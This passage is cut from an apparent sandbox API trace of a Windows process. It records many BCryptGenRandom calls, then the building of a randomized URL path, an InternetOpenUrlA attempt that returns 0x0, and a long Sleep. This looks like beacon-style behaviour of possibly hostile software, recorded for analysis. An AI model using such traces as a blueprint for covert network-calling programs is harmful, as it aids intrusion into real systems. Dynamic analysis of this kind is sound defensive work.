pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.832] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.832] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.832] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0176.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1788c, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x3a1788c) returned 0x0 [0176.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.837] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.837] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.837] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.837] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.838] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.838] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.838] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.838] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.838] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.838] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.839] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.839] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.839] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.839] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.839] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.839] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.839] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.839] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.839] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.839] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.839] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.840] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.840] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.840] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.840] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.840] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.840] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.840] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.841] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.841] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.841] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.841] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.842] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.842] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.842] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.842] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.842] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.842] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.842] GetProcessHeap () returned 0x440000 [0176.842] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473980 [0176.842] lstrcpyA (in: lpString1=0x473980, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0176.842] lstrcatA (in: lpString1="\x81\x03", lpString2="/mAS7mdwinel8m2I06Cow1azMbv/wB1zxqctKsqsc0wRahjg0vi9t9tLlqfpc3zu0Hlnp59hO39/b8fDnjtqxj0xqz7afjcwt6vheDDi2wiqi1xa1oufcppo4k0/" | out: lpString1="\x81\x03/mAS7mdwinel8m2I06Cow1azMbv/wB1zxqctKsqsc0wRahjg0vi9t9tLlqfpc3zu0Hlnp59hO39/b8fDnjtqxj0xqz7afjcwt6vheDDi2wiqi1xa1oufcppo4k0/") returned="\x81\x03/mAS7mdwinel8m2I06Cow1azMbv/wB1zxqctKsqsc0wRahjg0vi9t9tLlqfpc3zu0Hlnp59hO39/b8fDnjtqxj0xqz7afjcwt6vheDDi2wiqi1xa1oufcppo4k0/" [0176.843] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0176.843] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/mAS7mdwinel8m2I06Cow1azMbv/wB1zxqctKsqsc0wRahjg0vi9t9tLlqfpc3zu0Hlnp59hO39/b8fDnjtqxj0xqz7afjcwt6vheDDi2wiqi1xa1oufcppo4k0/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0176.843] GetProcessHeap () returned 0x440000 [0176.843] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473980 | out: hHeap=0x440000) returned 1 [0176.843] GetProcessHeap () returned 0x440000 [0176.843] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a17840 | out: hHeap=0x440000) returned 1 [0176.844] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0176.844] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0176.845] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0176.845] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0176.845] Sleep (dwMilliseconds=0x1c703) [0177.027] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.027] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0177.028] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0177.028] GetProcessHeap () returned 0x440000 [0177.028] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d52c0 [0177.028] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0177.028] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d52c1, cbBuffer=0x2e, dwFlags=0x2 | out: pbBuffer=0x4d52c1) returned 0x0 [0177.028] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.029] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.029] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.029] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.029] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.029] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.029] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.029] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.029] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.030] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.030] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0177.030] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.030] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.030] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.031] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.031] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.031] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.031] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.173] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.174] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.174] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.174] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.174] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.175] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.175] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.175] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.175] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.175] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.176] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.176] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.176] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.176] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.176] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.176] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.176] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.176] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.176] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.177] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.177] GetProcAddress 